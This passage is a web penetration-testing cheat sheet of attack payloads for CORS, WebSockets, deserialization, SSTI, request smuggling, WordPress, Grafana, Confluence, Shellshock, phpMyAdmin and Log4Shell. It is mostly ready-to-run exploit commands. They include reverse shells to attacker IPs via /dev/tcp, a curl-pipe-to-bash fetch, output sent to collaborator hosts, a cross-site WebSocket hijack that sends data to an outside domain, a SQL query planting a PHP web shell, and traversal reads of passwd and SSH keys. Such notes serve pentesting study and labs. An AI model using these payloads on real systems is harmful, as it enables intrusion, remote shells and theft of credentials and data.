        document.forms[0].submit();
</script>

Resources

Cross-origin resource sharing (CORS)

Classic CORS vulnerability

<script>
	var req = new XMLHttpRequest();
	req.onload = reqListener;
	req.open('get','https://<TARGET-URL>',true);
	req.withCredentials = true;
	req.send();
		
	function reqListener() {
		alert(this.responseText);
	};
</script>

CORS vulnerability with null origin

<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,<script>
		var req = new XMLHttpRequest();
		req.onload = reqListener;
		req.open('get','https://<TARGET-URL>',true);
		req.withCredentials = true;
		req.send();
		
		function reqListener() {
			alert(this.responseText);
		};
	</script>">
</iframe>

Resources

Clickjacking

Classic PoC

<style>
  iframe {
    position:relative;
    width:$width_value;
    height: $height_value;
    opacity: $opacity;
    z-index: 2;
  }
  div {
    position:absolute;
    top:$top_value;
    left:$side_value;
    z-index: 1;
  }
</style>
<div>Click me button</div>
<iframe src="$url"></iframe>

Resources

DOM-based vulnerabilities

Many DOM-based vulnerabilities can be traced back to problems with the way client-side code manipulates attacker-controllable data.

  • document.URL
  • document.documentURI
  • document.URLUnencoded
  • document.baseURI
  • location
  • document.cookie
  • document.referrer
  • window.name
  • history.pushState
  • history.replaceState
  • localStorage
  • sessionStorage
  • IndexedDB (mozIndexedDB, webkitIndexedDB, msIndexedDB)
  • Database
DOM-based vulnerability Example sink
DOM XSS document.write()
Open redirection window.location
Cookie manipulation document.cookie
JavaScript injection eval()
Document-domain manipulation document.domain
WebSocket-URL poisoning WebSocket()
Link manipulation someElement.src
Web-message manipulation postMessage()
Ajax request-header manipulation setRequestHeader()
Local file-path manipulation FileReader.readAsText()
Client-side SQL injection ExecuteSql()
HTML5-storage manipulation sessionStorage.setItem()
Client-side XPath injection document.evaluate()
Client-side JSON injection JSON.parse()
DOM-data manipulation someElement.setAttribute()
Denial of service RegExp()

WebSockets

Any web security vulnerability might arise in relation to WebSockets:

  • User-supplied input transmitted to the server might be processed in unsafe ways, leading to vulnerabilities such as SQL injection or XML external entity injection;
  • Some blind vulnerabilities reached via WebSockets might only be detectable using out-of-band (OAST) techniques;
  • If attacker-controlled data is transmitted via WebSockets to other application users, then it might lead to XSS or other client-side vulnerabilities.

Cross-site WebSocket hijacking (CSRF missing)

<script>
  websocket = new WebSocket('wss://websocket-URL');
  websocket.onopen = start;
  websocket.onmessage = handleReply;
  function start(event) {
    websocket.send("READY");
  }
  function handleReply(event) {
    fetch('https://your-domain/?'+event.data, {mode: 'no-cors'});
  }
</script>

Insecure deserialization

How to spot Insecure deserialization

  • PHP example O:4:"User":2:{s:4:"name":s:6:"carlos"; s:10:"isLoggedIn":b:1;}
  • Java objects always begin with the same bytes
    • Hex ac ed
    • Base64 rO0
  • .NET vulnerable deserarilaztion libraries: BinaryFormatter, SoapFormatter, NetDataContractSerializer, LosFormatter, ObjectStateFormatter
  • BinaryFormatter serialized objects usually starts with AAEAAAD

Ysoserial

Because of Runtime.exec(), ysoserial doesn't work well with multiple commands. After some research, I found a way to run multiple sys commands anyway, by using sh -c $@|sh . echo before the multiple commands that we need to run. Here I needed to run the command host and whoami:

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections7 'sh -c $@|sh . echo host $(whoami).<MY-RATOR-ID>.burpcollaborator.net' | gzip | base64

Other options

  • java --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED --add-opens java.base/java.net=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED -jar ysoserial-all.jar CommonsCollections4 "id"

Ysoserial.net

Windows Defender might tag the application as virus.

.\ysoserial.exe -g ClaimsPrincipal -f BinaryFormatter -c 'whoami | curl --data-binary @- http://yourcollaboratorserver' -bgc ActivitySurrogateDisableTypeCheck --minify --ust

PHPGGC

PHPGGC is a library of unserialize() payloads along with a tool to generate them, from command line or programmatically.

Burp extensions

Resources

Server-side template injection (SSTI)

Try fuzzing the template by injecting a sequence of special characters commonly used in template expressions, such as ${{<%[%'"}}%\. To identify the template engine submit invalid syntax to cause an error message.

The next step is look for the documentation to see how you can exploit the vulnerable endpoints and known vulnerabilities/exploits.

Some payloads:

{{7*7}}[[3*3]]
{{7*7}}
{{7*'7'}}
<%= 7 * 7 %>
${7*7}
${{7*7}}
@(7+7)
#{7*7}
#{ 7 * 7 }

Python

  • try then {{config}} and {{{{{}.__class__.__base__.__subclasses__()}}}}
  • python3 client.py '{{{}.__class__.__base__.__subclasses__()[400]("curl 192.168.45.237/shell.sh | bash", shell=True, stdout=-1).communicate()[0].decode()}}'
    • shell.sh
      bash -i >& /dev/tcp/192.168.118.9/8080 0>&1

Razor

Web cache poisoning

Constructing a web cache poisoning attack

  1. Identify and evaluate unkeyed inputs
  2. Elicit a harmful response from the back-end server
  3. Get the response cached

Cache key flaws Many websites and CDNs perform various transformations on keyed components when they are saved in the cache key:

  • Excluding the query string
  • Filtering out specific query parameters
  • Normalizing input in keyed components

Cache probing methodology

  1. Identify a suitable cache oracle
    • Simply a page or endpoint that provides feedback about the cache's behavior. This feedback could take various forms, such as: An HTTP header that explicitly tells you whether you got a cache hit, Observable changes to dynamic content, Distinct response times
  2. Probe key handling
    • Is anything being excluded from a keyed component when it is added to the cache key? Common examples are excluding specific query parameters, or even the entire query string, and removing the port from the Host header.
  3. Identify an exploitable gadget
    • These techniques enable you to exploit a number of unclassified vulnerabilities that are often dismissed as "unexploitable" and left unpatched.

HTTP Host header attacks

  • "If someone sends a cookie called '0', automattic.com responds with a list of all 152 cookies supported by the application: curl -v -H 'Cookie: 0=1' https://automattic.com/?cb=123 | fgrep Cookie" [Reference];
  • Carriage Return Line Feed (CRLF) injection: "When you find response header injection, you can probably do better than mere XSS or open-redir. Try injecting a short Content-Length header to cause a reverse desync and exploit random live users." [Reference]

HTTP request smuggling

Most HTTP request smuggling vulnerabilities arise because the HTTP specification provides two different ways to specify where a request ends:

  • Content-Length
    POST /search HTTP/1.1
    Host: normal-website.com
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 11
    q=smuggling
  • Transfer-Encoding
    POST /search HTTP/1.1
    Host: normal-website.com
    Content-Type: application/x-www-form-urlencoded
    Transfer-Encoding: chunked
    b
    q=smuggling
    0

Example

POST / HTTP/1.1
Host: smuggle-vulnerable.net
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked

0

G

Result: GPOST request

  • Some servers do not support the Transfer-Encoding header in requests;
  • Some servers that do support the Transfer-Encoding header can be induced not to process it if the header is obfuscated in some way.

Ways to obfuscate the Transfer-Encoding header

  • Transfer-Encoding: xchunked
  • Transfer-Encoding : chunked
  • Transfer-Encoding: chunked
  • Transfer-Encoding: x
  • Transfer-Encoding:[tab]chunked
  • [space]Transfer-Encoding: chunked
  • X: X[\n]Transfer-Encoding: chunked
  • Transfer-Encoding
    : chunked
    

Confirming CL.TE vulnerabilities using differential responses

POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Transfer-Encoding: chunked

e
q=smuggling&x=
0

GET /404 HTTP/1.1
Foo: x

Result

GET /404 HTTP/1.1
Foo: xPOST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

q=smuggling

Impact

  • Bypass front-end security controls
  • Revealing front-end request rewriting
  • Capturing other users' requests
  • Using HTTP request smuggling to exploit reflected XSS
  • Turn an on-site redirect into an open redirect
    Example of 301 in Apache and IIS web servers
    GET /home HTTP/1.1
    Host: normal-website.com
    HTTP/1.1 301 Moved Permanently
    Location: https://normal-website.com/home/
    Vulnerable request
    POST / HTTP/1.1
    Host: vulnerable-website.com
    Content-Length: 54
    Transfer-Encoding: chunked
    
    0
    
    GET /home HTTP/1.1
    Host: attacker-website.com
    Foo: X
    Result
    GET /home HTTP/1.1
    Host: attacker-website.com
    Foo: XGET /scripts/include.js HTTP/1.1
    Host: vulnerable-website.com
    HTTP/1.1 301 Moved Permanently
    Location: https://attacker-website.com/home/
  • Perform web cache poisoning
  • Perform web cache deception

Resource

JWT Attacks

A JWT consists of a header, a payload, and a signature. Each part is separated by a dot.

Common attacks

  • Accepting tokens with no signature
  • Brute-forcing secret keys using hashcat
    • You need a valid JWT and a wordlist
    • hashcat -a 0 -m 16500 <jwt> <wordlist>
    • If any of the signatures match, hashcat will give you an output like this <jwt>:<identified-secret> along with other details
    • Once identified the secret key, you can use it to generate a valid signature for any JWT header and payload that you like. See Signing JWTs
  • Injecting self-signed JWTs via the jwk, jku or kid parameter
  • Change Content-Type in cty to achieve XXE and deserialization attacks
  • x5c (X.509 Certificate Chain) can lead to CVE-2017-2800 and CVE-2018-2633
  • JWT algorithm confusion

Resources

OAuth authentication

How OAuth 2.0 works:

  • Client application The website or web application that wants to access the user's data;
  • Resource owner The user whose data the client application wants to access;
  • OAuth service provider The website or application that controls the user's data and access to it. They support OAuth by providing an API for interacting with both an authorization server and a resource server.

OAuth flow

oauth-flow

Following standard endpoints:

  • /.well-known/oauth-authorization-server
  • /.well-known/openid-configuration

Vulnerabilities in the client application

  • Improper implementation of the implicit grant type
  • Flawed CSRF protection

Vulnerabilities in the OAuth service

  • Leaking authorization codes and access tokens
  • Flawed scope validation
  • Unverified user registration

GraphQL

To analyze the schema: vangoncharov.github.io/graphql-voyager/ or InQL for Burp Suite.

GraphQL Introspection query

{"query": "{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}
{query: __schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}
{"operationName":"IntrospectionQuery","variables":{},"query":"query IntrospectionQuery {\n  __schema {\n    queryType {\n      name\n    }\n    mutationType {\n      name\n    }\n    subscriptionType {\n      name\n    }\n    types {\n      ...FullType\n    }\n    directives {\n      name\n      description\n      locations\n      args {\n        ...InputValue\n      }\n    }\n  }\n}\n\nfragment FullType on __Type {\n  kind\n  name\n  description\n  fields(includeDeprecated: true) {\n    name\n    description\n    args {\n      ...InputValue\n    }\n    type {\n      ...TypeRef\n    }\n    isDeprecated\n    deprecationReason\n  }\n  inputFields {\n    ...InputValue\n  }\n  interfaces {\n    ...TypeRef\n  }\n  enumValues(includeDeprecated: true) {\n    name\n    description\n    isDeprecated\n    deprecationReason\n  }\n  possibleTypes {\n    ...TypeRef\n  }\n}\n\nfragment InputValue on __InputValue {\n  name\n  description\n  type {\n    ...TypeRef\n  }\n  defaultValue\n}\n\nfragment TypeRef on __Type {\n  kind\n  name\n  ofType {\n    kind\n    name\n    ofType {\n      kind\n      name\n      ofType {\n        kind\n        name\n        ofType {\n          kind\n          name\n          ofType {\n            kind\n            name\n            ofType {\n              kind\n              name\n              ofType {\n                kind\n                name\n              }\n            }\n          }\n        }\n      }\n    }\n  }\n}\n"}

WordPress

  • Information Disclosure [high]: /_wpeprivate/config.json
  • Data exposure:
    • /wp-json/wp/v2/users/
    • /wp-json/th/v1/user_generation
    • /?rest_route=/wp/v2/users
  • Register:
    • http://192.168.157.166/wp-login.php?action=register
    • http://192.168.157.166/wp-signup.php
  • xmlrpc.php enabled, reference. Send a post request to this endpoint with a body like this:
    <?xml version="1.0" encoding="utf-8"?>
    <methodCall>
    <methodName>system.listMethods</methodName>
    <params></params>
    </methodCall>
  • Use Nuclei to detect WordPress websites from a list of targets with: nuclei -l subdomains.txt -t %USERPROFILE%/nuclei-templates/technologies/wordpress-detect.yaml
  • Scan with WPScan github.com/wpscanteam/wpscan with
    • wpscan --url <domain> --enumerate u enumerate users
    • wpscan --url <domain> -U users.txt -P password.txt try to find valid credentials
    • wpscan --url <domain> --api-token <your-api-token>
    • wpscan --url <target> --enumerate p --plugins-detection aggressive -o results
    • wpscan --url https://example[.]com --api-token <api token> --plugins-detection mixed -e vp,vt,cb,dbe,u1-10 --force [source]
  • Nuclei templates %USERPROFILE%\nuclei-templates\vulnerabilities\wordpress
  • If you login as admin, you can achieve RCE
    • modify the theme in 'Appearance' > 'Theme Editor'
    • add <?php exec("whoami")?>
  • https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/wordpress
  • Check wp-config.php
  • Find outdated plugins and use searchsploit

Resources

IIS - Internet Information Services

  • Check if trace.axd is enabled
  • Search for
    Views/web.config
    bin/WebApplication1.dll
    System.Web.Mvc.dll
    System.Web.Mvc.Ajax.dll
    System.Web.Mvc.Html.dll
    System.Web.Optimization.dll
    System.Web.Routing.dll
    
  • Other common files
  • Microsoft IIS 6.0, many RCE and BoF
  • Tilde / shortname enumeration
    1. [200 expected] curl --silent -v -X OPTIONS "http://10.10.10.93/idontexist*~.*" 2>&1 | grep "HTTP/1.1"
    2. [404 expected] curl --silent -v -X OPTIONS "http://10.10.10.93/aspnet~1.*" 2>&1 | grep "HTTP/1.1"
    3. java -jar /home/kali/Documents/web-attack/IIS-ShortName-Scanner/release/iis_shortname_scanner.jar 2 20 http://10.10.10.93 /home/kali/Documents/web-attack/IIS-ShortName-Scanner/release/config.xml
  • IIS file extensions https://learn.microsoft.com/en-us/previous-versions/2wawkw1c(v=vs.140)?redirectedfrom=MSDN

Resources

Microsoft SharePoint

  • Go to http://target.com/_layouts/viewlsts.aspx to see files shared / Site Contents

Lotus Domino

phpLDAPadmin

  • Endpoint: phpldapadmin/index.php
  • Try default logins
  • XSS
    • cmd.php?cmd=template_engine&dn=%27%22()%26%25%3Czzz%3E%3CScRiPt%20%3Ealert(%27Orwa%27)%3C/ScRiPt%3E&meth=ajax&server_id=1
    • cmd.php?server_id=<script>alert('Orwa')</script>
  • See Godfather Orwa's tweet

Git source code exposure

Once you have the source code, look for the secrets within the files. To find secrets, you can use trufflehog.

Other tools

  • DotGit find if a website has .git exposed
  • nuclei template %USERPROFILE%\nuclei-templates\exposures\configs\git-config.yaml
  • GitDumper from GitTools

Subdomain takeover

Tools

4** Bypass

  • byp4xx, s/o to m0pam for the tip
  • Search for subdomain with subfinder. Httpx filters subdomains with a 403 response and prints their cname. Test the cname for a bypass subfinder -d atg.se — silent | httpx -sc -mc 403 -cname, s/o to drak3hft7 for the tip
  • 403 Bypasser Burp extension, test 403 bypasses on the run
  • Replace HTTP/n with HTTP/1.1, HTTP/2 or HTTP/3
  • Change the request from GET to POST or viceversa

Application level Denial of Service

  • If the application gives the possibility to download data, try to download too much data
    • If there are restrictions, try to bypass
  • In file uploads, try to upload huge files
  • In chat section, try to send big messages and see how the application behaves
  • Regular expression Denial of Service - ReDoS
  • Long Password DoS Attack (Note: the value of password is hashed and then stored in Databases)
    • Check for length restriction and play with it
    • If there is no restriction, test until the application slows down
  • password.txt
  • Long string DoS
  • DoS against a victim
    • Sending a reset link might disable an user's account, spam to prevent the user from accessing their account
    • Multiple wrong passwords might disable an user's account

APIs attacks

Common API path convention: /api_name/v1

Bruteforce APIs paths with gobuster

  1. Create a pattern file
    echo {GOBUSTER}/v1 > patterns
    echo {GOBUSTER}/v2 >> patterns
    echo {GOBUSTER}/v3 >> patterns
    
  2. Run the command gobuster dir -u <TARGET> -w /usr/share/wordlists/wordlist.txt -p patterns
  3. Inspect the endpoints fuond with curl and use recursion

Grafana attacks

CVE-2021-43798: Grafana versions 8.0.0-beta1 through 8.3.0, except for patched versions, are vulnerable to directory traversal

  • curl --path-as-is http://<TARGET>:3000/public/plugins/alertlist/../../../../../../../../etc/passwd
    • Check also for sqlite3 database /var/lib/grafana/grafana.db and conf/defaults.ini config file

Confluence attacks

CVE-2022-26134

  1. See: Active Exploitation of Confluence CVE-2022-26134
  2. curl http://<Confluence-IP>:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/<YOUR-IP>/<YOUR-PORT>%200%3E%261%27%29.start%28%29%22%29%7D/
  3. Run a listener nc -nvlp 4444

Kibana

  • RCE https://github.com/mpgn/CVE-2019-7609
  • If you are unable to get code execution reset the machine and try again in a incognito browser window.
  • Remember run the payload on Timelion and then navigate Canvas to trigger it

Argus Surveillance DVR

  • LFI: http://192.168.212.179:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FUsers%2FViewer%2F.ssh%2Fid_rsa&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=%22
  • Password located at C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini
    • weak password encryption
    • l'exploit trova un carattere per volta. Non funziona con i caratteri speciali > se trovi 'Unknown' significa che `e un carattere speciale e lo devi scoprire manualmente

Shellshock

  • If you find /cgi-bin/, search for extensions sh, cgi, py, pl and more
  • curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.49.124/1234 0>&1' http://192.168.124.87/cgi-bin/test.sh

Cassandra web

RaspAP

  • http://192.168.157.97:8091/includes/webconsole.php

Drupal

  • Enumerate version by seeing /CHANGELOG.txt
  • Enumerate modules and search for specific vulnerabilities
  • Enumerate nodes with Burp Intruder and https://drupal-target.io/node/§1§ to find hidden pages
  • droopescan scan drupal -u https://drupal-target.io

Drupalgeddon

Drupal 7.x and PHP Filter RCE

  • If the core module "PHP Filter" is enabled, it is possible to inject PHP code where you can submit content
  • If you are admin, you can create a new page with PHP code through /node/add/page

Tomcat

Booked Scheduler

phpMyAdmin

  • Try root without password or root:password
  • If you can login, try this query for a RCE
    SELECT "<?php echo system($_GET['cmd']); ?>" into outfile "/var/www/html/web/backdoor.php"
    SELECT LOAD_FILE('C:\\xampp\\htdocs\\nc.exe') INTO DUMPFILE 'C:\\xampp\\htdocs\\nc.exe';

PHP

Symphony

Adobe ColdFusion

Webmin

Broken Link Hijacking

Resources:

Log4Shell

  • Payload: Referer: ${jndi:ldap://h${hostname}.BURPCOLLABORATOR/s2test}

Spring Boot

  • Check /env for RCE, /heapdump for private keys
  • Check also /jolokia

Resources

Apache

Misconfiguration leading to SSRF

GET http://localhost:22
Host: redacted.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Accept: */*